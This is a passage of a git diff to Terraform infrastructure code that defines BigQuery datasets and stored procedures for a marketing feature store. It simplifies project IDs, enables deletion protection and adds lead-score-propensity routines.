maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.auto_audience_segmentation.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.aggregated_vbb.max_time_travel_hours - deletion_protection = false - time_partitioning = null, - range_partitioning = null, - expiration_time = null, - clustering = [], - labels = {}, + { + table_id = table_id + schema = file("../../sql/schema/table/${table_id}.json") + # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. + # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.auto_audience_segmentation.max_time_travel_hours configuration. + max_time_travel_hours = local.config_bigquery.dataset.aggregated_vbb.max_time_travel_hours + deletion_protection = false + time_partitioning = null, + range_partitioning = null, + expiration_time = null, + clustering = [], + labels = {}, }] } @@ -236,13 +262,13 @@ module "aggregated_vbb" { # the aggregated predictions generated by the predictions pipelines. module "aggregated_predictions" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" - dataset_id = local.config_bigquery.dataset.aggregated_predictions.name - dataset_name = local.config_bigquery.dataset.aggregated_predictions.friendly_name - description = local.config_bigquery.dataset.aggregated_predictions.description - project_id = local.config_bigquery.dataset.aggregated_predictions.project_id - location = local.config_bigquery.dataset.aggregated_predictions.location + dataset_id = local.config_bigquery.dataset.aggregated_predictions.name + dataset_name = local.config_bigquery.dataset.aggregated_predictions.friendly_name + description = local.config_bigquery.dataset.aggregated_predictions.description + project_id = local.config_bigquery.dataset.aggregated_predictions.project_id + location = local.config_bigquery.dataset.aggregated_predictions.location # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to true, which means that the contents of the dataset will be deleted when the dataset is destroyed. delete_contents_on_destroy = true @@ -250,7 +276,7 @@ module "aggregated_predictions" { # The tables attribute is used to configure the BigQuery table within the dataset tables = [ { - table_id = "latest" + table_id = "latest" # The schema of the table, defined in a JSON file. schema = file("../../sql/schema/table/aggregated_predictions_latest.json") time_partitioning = null, @@ -270,7 +296,7 @@ module "aggregated_predictions" { # it failed to create resources that are already exist. To resolve you # need to import the the existing dataset and tables to terraform using # the following commands: -# > `terraform -chdir="${TERRAFORM_RUN_DIR}" import module.feature_store[0].module.gemini_insights.google_bigquery_dataset.main 'projects/${MAJ_FEATURE_STORE_PROJECT_ID}/datasets/gemini_insights'` +# > `terraform -chdir="${TERRAFORM_RUN_DIR}" import 'module.feature_store[0].module.gemini_insights.google_bigquery_dataset.main' 'projects/${MAJ_FEATURE_STORE_PROJECT_ID}/datasets/gemini_insights'` # # > `terraform -chdir="${TERRAFORM_RUN_DIR}" import 'module.feature_store[0].module.gemini_insights.google_bigquery_table.main["user_behaviour_revenue_insights_monthly"]' 'projects/${MAJ_FEATURE_STORE_PROJECT_ID}/datasets/gemini_insights/tables/user_behaviour_revenue_insights_monthly'` # @@ -291,35 +317,36 @@ locals { module "gemini_insights" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.config_bigquery.dataset.gemini_insights.name dataset_name = local.config_bigquery.dataset.gemini_insights.friendly_name description = local.config_bigquery.dataset.gemini_insights.description - project_id = null_resource.check_bigquery_api.id != "" ? local.gemini_insights_project_id : local.feature_store_project_id + project_id = local.gemini_insights_project_id location = local.config_bigquery.dataset.gemini_insights.location # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. - delete_contents_on_destroy = true + delete_contents_on_destroy = false + deletion_protection = true dataset_labels = { - version = "prod", - dataset_id = local.config_bigquery.dataset.gemini_insights.name + version = "prod", + dataset_id = local.config_bigquery.dataset.gemini_insights.name } tables = [for table_id in local.gemini_insights_tables : - { - table_id = table_id - schema = file("../../sql/schema/table/${table_id}.json") - # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. - # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.gemini_insights.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.gemini_insights.max_time_travel_hours - deletion_protection = false - time_partitioning = null, - range_partitioning = null, - expiration_time = null, - clustering = [], - labels = {}, + { + table_id = table_id + schema = file("../../sql/schema/table/${table_id}.json") + # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. + # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.gemini_insights.max_time_travel_hours configuration. + max_time_travel_hours = local.config_bigquery.dataset.gemini_insights.max_time_travel_hours + deletion_protection = true + time_partitioning = null, + range_partitioning = null, + expiration_time = null, + clustering = [], + labels = {}, }] } @@ -330,7 +357,7 @@ resource "null_resource" "check_gemini_insights_dataset_exists" { command = <<-EOT COUNTER=0 MAX_TRIES=100 - while ! bq ls --filter labels.dataset_id:${local.config_bigquery.dataset.gemini_insights.name} --max_results 1 --format=json --project_id ${module.gemini_insights.project} && [ $COUNTER -lt $MAX_TRIES ] + while ! bq ls --filter labels.dataset_id:${local.config_bigquery.dataset.gemini_insights.name} --max_results 1 --format=json --project_id ${local.gemini_insights_project_id} && [ $COUNTER -lt $MAX_TRIES ] do sleep 6 printf "." @@ -347,4 +374,4 @@ resource "null_resource" "check_gemini_insights_dataset_exists" { depends_on = [ module.gemini_insights.google_bigquery_dataset ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf b/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf index d34ee0e2..71eabf3f 100644 --- a/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf +++ b/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf @@ -26,7 +26,7 @@ data "local_file" "audience_segmentation_inference_preparation_file" { # The procedure is typically invoked before running the Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for accurate predictions. resource "google_bigquery_routine" "audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -54,13 +54,13 @@ data "local_file" "aggregated_value_based_bidding_training_preparation_file" { # The procedure is typically invoked before running the Aggregated Value Based Bidding model to ensure that the input data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "aggregated_value_based_bidding_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "aggregated_value_based_bidding_training_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "aggregated_value_based_bidding_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.aggregated_value_based_bidding_training_preparation_file.content - description = "Procedure that prepares features for Aggregated VBB model training." + description = "Procedure that prepares features for Aggregated VBB model training." } @@ -78,13 +78,13 @@ data "local_file" "aggregated_value_based_bidding_explanation_preparation_file" # The procedure is typically invoked before running the Aggregated Value Based Bidding model to ensure that the input data # is in the correct format and contains the necessary features for explanation. resource "google_bigquery_routine" "aggregated_value_based_bidding_explanation_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "aggregated_value_based_bidding_explanation_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "aggregated_value_based_bidding_explanation_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.aggregated_value_based_bidding_explanation_preparation_file.content - description = "Procedure that prepares features for Aggregated VBB model explanation." + description = "Procedure that prepares features for Aggregated VBB model explanation." } # This resource reads the contents of a local SQL file named auto_audience_segmentation_inference_preparation.sql and @@ -101,7 +101,7 @@ data "local_file" "auto_audience_segmentation_inference_preparation_file" { # The procedure is typically invoked before running the Auto Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "auto_audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "auto_audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -128,7 +128,7 @@ data "local_file" "audience_segmentation_training_preparation_file" { # The procedure is typically invoked before running the Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -170,7 +170,7 @@ data "local_file" "auto_audience_segmentation_training_preparation_file" { # The procedure is typically invoked before running the Auto Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "auto_audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id + project = local.auto_audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "auto_audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -207,7 +207,7 @@ data "local_file" "customer_lifetime_value_inference_preparation_file" { # The procedure is typically invoked before running the Customer Lifetime Value model to ensure that the input data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "customer_lifetime_value_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "customer_lifetime_value_inference_preparation" routine_type = "PROCEDURE" @@ -233,7 +233,7 @@ data "local_file" "customer_lifetime_value_label_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the labeled data # is in the correct format and ready for training. resource "google_bigquery_routine" "customer_lifetime_value_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "customer_lifetime_value_label" routine_type = "PROCEDURE" @@ -269,7 +269,7 @@ data "local_file" "customer_lifetime_value_training_preparation_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the features data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "customer_lifetime_value_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "customer_lifetime_value_training_preparation" routine_type = "PROCEDURE" @@ -310,7 +310,7 @@ data "local_file" "purchase_propensity_inference_preparation_file" { # The procedure is typically invoked before prediction the Purchase Propensity model to ensure that the features data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "purchase_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "purchase_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -336,7 +336,7 @@ data "local_file" "churn_propensity_inference_preparation_file" { # The procedure is typically invoked before prediction the Churn Propensity model to ensure that the features data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "churn_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "churn_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -350,6 +350,32 @@ resource "google_bigquery_routine" "churn_propensity_inference_preparation" { } } +# This resource reads the contents of a local SQL file named lead_score_propensity_inference_preparation.sql and +# stores it in a variable named lead_score_propensity_inference_preparation_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named lead_score_propensity_inference_preparation. +data "local_file" "lead_score_propensity_inference_preparation_file" { + filename = "${local.sql_dir}/procedure/lead_score_propensity_inference_preparation.sql" +} + +# The lead_score_propensity_inference_preparation procedure is designed to prepare features for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before prediction the Lead Score Propensity model to ensure that the features data +# is in the correct format and contains the necessary features for prediction. +resource "google_bigquery_routine" "lead_score_propensity_inference_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "lead_score_propensity_inference_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.lead_score_propensity_inference_preparation_file.content + description = "Procedure that prepares features for Lead Score Propensity model inference. User-per-day granularity level features. Run this procedure every time before Lead Score Propensity model predict." + arguments { + name = "inference_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } +} + # This resource reads the contents of a local SQL file named purchase_propensity_label.sql and # stores it in a variable named purchase_propensity_label_file.content. # The SQL file is expected to contain the definition of a BigQuery procedure named purchase_propensity_label. @@ -362,7 +388,7 @@ data "local_file" "purchase_propensity_label_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the labeled data # is in the correct format and ready for training. resource "google_bigquery_routine" "purchase_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "purchase_propensity_label" routine_type = "PROCEDURE" @@ -398,7 +424,7 @@ data "local_file" "churn_propensity_label_file" { # The procedure is typically invoked before training the Churn Propensity model to ensure that the labeled data # is in the correct format and ready for training. resource "google_bigquery_routine" "churn_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "churn_propensity_label" routine_type = "PROCEDURE" @@ -422,6 +448,42 @@ resource "google_bigquery_routine" "churn_propensity_label" { } } +# This resource reads the contents of a local SQL file named lead_score_propensity_label.sql and +# stores it in a variable named lead_score_propensity_label_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named lead_score_propensity_label. +data "local_file" "lead_score_propensity_label_file" { + filename = "${local.sql_dir}/procedure/lead_score_propensity_label.sql" +} + +# The lead_score_propensity_label procedure is designed to prepare label for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before training the Lead Score Propensity model to ensure that the labeled data +# is in the correct format and ready for training. +resource "google_bigquery_routine" "lead_score_propensity_label" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "lead_score_propensity_label" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.lead_score_propensity_label_file.content + description = "User-per-day granularity level labels. Run this procedure daily." + arguments { + name = "input_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "end_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "rows_added" + mode = "OUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } +} + # This resource reads the contents of a local SQL file named purchase_propensity_training_preparation.sql and # stores it in a variable named purchase_propensity_training_preparation_file.content. # The SQL file is expected to contain the definition of a BigQuery procedure named purchase_propensity_training_preparation. @@ -434,7 +496,7 @@ data "local_file" "purchase_propensity_training_preparation_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "purchase_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "purchase_propensity_training_preparation" routine_type = "PROCEDURE" @@ -463,6 +525,46 @@ resource "google_bigquery_routine" "purchase_propensity_training_preparation" { } } +# This resource reads the contents of a local SQL file named lead_score_propensity_training_preparation.sql and +# stores it in a variable named lead_score_propensity_training_preparation_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named lead_score_propensity_training_preparation. +data "local_file" "lead_score_propensity_training_preparation_file" { + filename = "${local.sql_dir}/procedure/lead_score_propensity_training_preparation.sql" +} + +# The lead_score_propensity_training_preparation procedure is designed to prepare features for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before training the Lead Score Propensity model to ensure that the features data +# is in the correct format and contains the necessary features for training. +resource "google_bigquery_routine" "lead_score_propensity_training_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "lead_score_propensity_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.lead_score_propensity_training_preparation_file.content + description = "Procedure that prepares features for Lead Score Propensity model training. User-per-day granularity level features. Run this procedure every time before Lead Score Propensity model train." + arguments { + name = "start_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "end_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "train_split_end_number" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } + arguments { + name = "validation_split_end_number" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } +} # This resource reads the contents of a local SQL file named churn_propensity_training_preparation.sql and # stores it in a variable named churn_propensity_training_preparation_file.content. @@ -476,7 +578,7 @@ data "local_file" "churn_propensity_training_preparation_file" { # The procedure is typically invoked before training the Churn Propensity model to ensure that the features data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "churn_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "churn_propensity_training_preparation" routine_type = "PROCEDURE" @@ -517,7 +619,7 @@ data "local_file" "user_dimensions_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_dimensions" routine_type = "PROCEDURE" @@ -553,7 +655,7 @@ data "local_file" "user_lifetime_dimensions_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_lifetime_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_lifetime_dimensions" routine_type = "PROCEDURE" @@ -589,7 +691,7 @@ data "local_file" "user_lookback_metrics_file" { # The procedure is typically invoked before training the Audience Segmentation model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_lookback_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_lookback_metrics" routine_type = "PROCEDURE" @@ -625,7 +727,7 @@ data "local_file" "user_rolling_window_lifetime_metrics_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_rolling_window_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_rolling_window_lifetime_metrics" routine_type = "PROCEDURE" @@ -661,7 +763,7 @@ data "local_file" "user_rolling_window_metrics_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_rolling_window_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_rolling_window_metrics" routine_type = "PROCEDURE" @@ -685,6 +787,42 @@ resource "google_bigquery_routine" "user_rolling_window_metrics" { } } +# This resource reads the contents of a local SQL file named user_rolling_window_lead_metrics.sql and +# stores it in a variable named user_rolling_window_lead_metrics_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named user_rolling_window_lead_metrics. +data "local_file" "user_rolling_window_lead_metrics_file" { + filename = "${local.sql_dir}/procedure/user_rolling_window_lead_metrics.sql" +} + +# The user_rolling_window_lead_metrics procedure is designed to prepare the features for the Purchase Propensity model. +# ## +# The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data +# is in the correct format and ready for training. +resource "google_bigquery_routine" "user_rolling_window_lead_metrics" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "user_rolling_window_lead_metrics" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.user_rolling_window_lead_metrics_file.content + description = "User-per-day granularity level metrics. Run this procedure daily. Metrics calculated using a rolling window operation." + arguments { + name = "input_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "end_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "rows_added" + mode = "OUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } +} + # This resource reads the contents of a local SQL file named user_scoped_lifetime_metrics.sql data "local_file" "user_scoped_lifetime_metrics_file" { filename = "${local.sql_dir}/procedure/user_scoped_lifetime_metrics.sql" @@ -692,7 +830,7 @@ data "local_file" "user_scoped_lifetime_metrics_file" { # The user_rolling_window_metrics procedure is designed to prepare the features for the Customer Lifetime Value model. resource "google_bigquery_routine" "user_scoped_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_scoped_lifetime_metrics" routine_type = "PROCEDURE" @@ -723,7 +861,7 @@ data "local_file" "user_scoped_metrics_file" { # The user_scoped_metrics procedure is designed to prepare the features for the Purchase Propensity model. resource "google_bigquery_routine" "user_scoped_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_scoped_metrics" routine_type = "PROCEDURE" @@ -754,7 +892,7 @@ data "local_file" "user_scoped_segmentation_metrics_file" { # The user_scoped_segmentation_metrics procedure is designed to prepare the features for the Audience Segmentation model. resource "google_bigquery_routine" "user_scoped_segmentation_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_scoped_segmentation_metrics" routine_type = "PROCEDURE" @@ -785,7 +923,7 @@ data "local_file" "user_segmentation_dimensions_file" { # The user_segmentation_dimensions procedure is designed to prepare the features for the Audience Segmentation model. resource "google_bigquery_routine" "user_segmentation_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_segmentation_dimensions" routine_type = "PROCEDURE" @@ -816,7 +954,7 @@ data "local_file" "user_session_event_aggregated_metrics_file" { # The user_session_event_aggregated_metrics procedure is designed to prepare the features for the Purchase Propensity model. resource "google_bigquery_routine" "user_session_event_aggregated_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_session_event_aggregated_metrics" routine_type = "PROCEDURE" @@ -847,7 +985,7 @@ data "local_file" "aggregate_predictions_procedure_file" { # The aggregate_last_day_predictions procedure is designed to aggregated the latest predictions from all models. resource "google_bigquery_routine" "aggregate_last_day_predictions" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregate_predictions_project_id : local.feature_store_project_id + project = local.aggregate_predictions_project_id dataset_id = module.aggregated_predictions.bigquery_dataset.dataset_id routine_id = "aggregate_last_day_predictions" routine_type = "PROCEDURE" @@ -855,33 +993,6 @@ resource "google_bigquery_routine" "aggregate_last_day_predictions" { definition_body = data.local_file.aggregate_predictions_procedure_file.content } -# This resource reads the contents of a local SQL file named user_behaviour_revenue_insights.sql and -# stores it in a variable named user_behaviour_revenue_insights_file.content. -# The SQL file is expected to contain the definition of a BigQuery procedure named user_behaviour_revenue_insights. -data "local_file" "user_behaviour_revenue_insights_file" { - filename = "${local.sql_dir}/procedure/user_behaviour_revenue_insights.sql" -} - -# The user_behaviour_revenue_insights procedure is designed to generate gemini insights. -resource "google_bigquery_routine" "user_behaviour_revenue_insights" { - project = null_resource.check_bigquery_api.id != "" ? local.gemini_insights_project_id : local.feature_store_project_id - dataset_id = local.config_bigquery.dataset.gemini_insights.name - routine_id = "user_behaviour_revenue_insights" - routine_type = "PROCEDURE" - language = "SQL" - definition_body = data.local_file.user_behaviour_revenue_insights_file.content - description = "Procedure that generates gemini insights for . Daily granularity level. Run this procedure every day before consuming gemini insights on the Looker Dahboard." - arguments { - name = "input_date" - mode = "INOUT" - data_type = jsonencode({ "typeKind" : "DATE" }) - } - - depends_on = [ - null_resource.check_gemini_model_exists - ] -} - /* *Including the backfill routines */ @@ -893,7 +1004,7 @@ data "local_file" "invoke_backfill_customer_lifetime_value_label_file" { # The invoke_backfill_customer_lifetime_value_label procedure is designed to invoke the backfill query for customer_lifetime_value_label. resource "google_bigquery_routine" "invoke_backfill_customer_lifetime_value_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_customer_lifetime_value_label" routine_type = "PROCEDURE" @@ -907,7 +1018,7 @@ data "local_file" "invoke_backfill_purchase_propensity_label_file" { } resource "google_bigquery_routine" "invoke_backfill_purchase_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_purchase_propensity_label" routine_type = "PROCEDURE" @@ -921,7 +1032,7 @@ data "local_file" "invoke_backfill_churn_propensity_label_file" { } resource "google_bigquery_routine" "invoke_backfill_churn_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_churn_propensity_label" routine_type = "PROCEDURE" @@ -930,12 +1041,26 @@ resource "google_bigquery_routine" "invoke_backfill_churn_propensity_label" { description = "Procedure that backfills the churn_propensity_label feature table. Run this procedure occasionally before training the models." } +data "local_file" "invoke_backfill_lead_score_propensity_label_file" { + filename = "${local.sql_dir}/query/invoke_backfill_lead_score_propensity_label.sql" +} + +resource "google_bigquery_routine" "invoke_backfill_lead_score_propensity_label" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_backfill_lead_score_propensity_label" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_backfill_lead_score_propensity_label_file.content + description = "Procedure that backfills the lead_score_propensity_label feature table. Run this procedure occasionally before training the models." +} + data "local_file" "invoke_backfill_user_dimensions_file" { filename = "${local.sql_dir}/query/invoke_backfill_user_dimensions.sql" } resource "google_bigquery_routine" "invoke_backfill_user_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_dimensions" routine_type = "PROCEDURE" @@ -949,7 +1074,7 @@ data "local_file" "invoke_backfill_user_lifetime_dimensions_file" { } resource "google_bigquery_routine" "invoke_backfill_user_lifetime_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_lifetime_dimensions" routine_type = "PROCEDURE" @@ -964,7 +1089,7 @@ data "local_file" "invoke_backfill_user_lookback_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_lookback_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_lookback_metrics" routine_type = "PROCEDURE" @@ -979,7 +1104,7 @@ data "local_file" "invoke_backfill_user_rolling_window_lifetime_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_rolling_window_lifetime_metrics" routine_type = "PROCEDURE" @@ -994,7 +1119,7 @@ data "local_file" "invoke_backfill_user_rolling_window_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_metrics" { - project = 